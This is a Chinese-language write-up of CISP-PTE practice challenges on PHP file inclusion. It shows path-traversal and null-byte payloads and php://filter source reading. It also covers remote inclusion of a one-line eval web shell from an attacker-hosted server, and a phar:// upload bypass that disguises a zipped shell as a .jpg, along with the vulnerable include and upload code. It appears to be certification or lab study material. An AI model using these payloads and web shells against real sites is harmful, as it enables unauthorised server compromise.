当前位置:网站首页>2022 CISP-PTE(一)文件包含

2022 CISP-PTE(一)文件包含

2022-06-27 06:35:00 Aτθ

一、本地文件包含(基礎)

在這裏插入圖片描述

1、第一道

在這裏插入圖片描述

2、第二道

....//....//flag.txt

在這裏插入圖片描述

3、第三道

....//....//flag.txt%00

在這裏插入圖片描述
在這裏插入圖片描述

4、第四道

....//....//....//flag.txt%00

在這裏插入圖片描述

在這裏插入圖片描述

二、本地文件包含(實操)

1、第一道

在這裏插入圖片描述
在這裏插入圖片描述

php://filter/convert.base64-encode/resource=../key.php

在這裏插入圖片描述
在這裏插入圖片描述

2、第二道

在這裏插入圖片描述
在這裏插入圖片描述

2.1 查看答題頁面源碼

查看答題頁面源碼,無任何有用信息。

在這裏插入圖片描述
在這裏插入圖片描述

直接訪問view.html文件,並查看源代碼。

在這裏插入圖片描述

在這裏插入圖片描述
在這裏插入圖片描述

2.2 傳入參數

在這裏插入圖片描述
在這裏插入圖片描述

2.3 查看源碼

在這裏插入圖片描述

三、遠程文件包含(實操)

1、第一道

1.1 打開題目

在這裏插入圖片描述
在這裏插入圖片描述

1.2 初步嘗試

在這裏插入圖片描述
在這裏插入圖片描述

1.3 遠程文件包含

無法進行截斷,換用遠程文件包含。

在這裏插入圖片描述
在這裏插入圖片描述

1.4 蟻劍鏈接

http://49.235.78.245:1117/start/index.php?page=http://49.235.78.245/1

在這裏插入圖片描述

在這裏插入圖片描述
在這裏插入圖片描述

2、本地啟動一個遠程服務器

2.1 在用戶目錄下放一句話

1.txt
<?php @eval($_POST['c']);?>

目錄:
C:\Users\Administrator

在這裏插入圖片描述

2.2 啟動

python3執行:python3 -m http.server
python2執行: python2 -m SimpleHTTPServer

在這裏插入圖片描述
在這裏插入圖片描述

2.3 成功

http://192.168.1.107:8000/1.txt

在這裏插入圖片描述

3、第二道

3.1 查看題目源碼

在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述

3.2 讀取include.php和upload.php源碼

php://filter/convert.base64-encode/resource=include

在這裏插入圖片描述
在這裏插入圖片描述

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
    
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
    
            echo "<p> error! </p>";
        }
        else
        {
    
            include($file.'.php');
        }
    }
?>

在這裏插入圖片描述

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
    
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in: " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
    
        echo "upload failed!";
    }
}
?>

3.3 上傳文件

180.php:
<?php @eval($_POST['c']);?>

1180.php寫一句話;
2180.php壓縮為180.zip;
3、改寫180.zip為180.jpg

在這裏插入圖片描述

3.4 讀取文件

?file=phar://upload/180.jpg/180
c=phpinfo();

在這裏插入圖片描述

3.5 鏈接蟻劍

在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述

原网站

版权声明
本文为[Aτθ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/178/202206270626257220.html

边栏推荐

猜你喜欢

随机推荐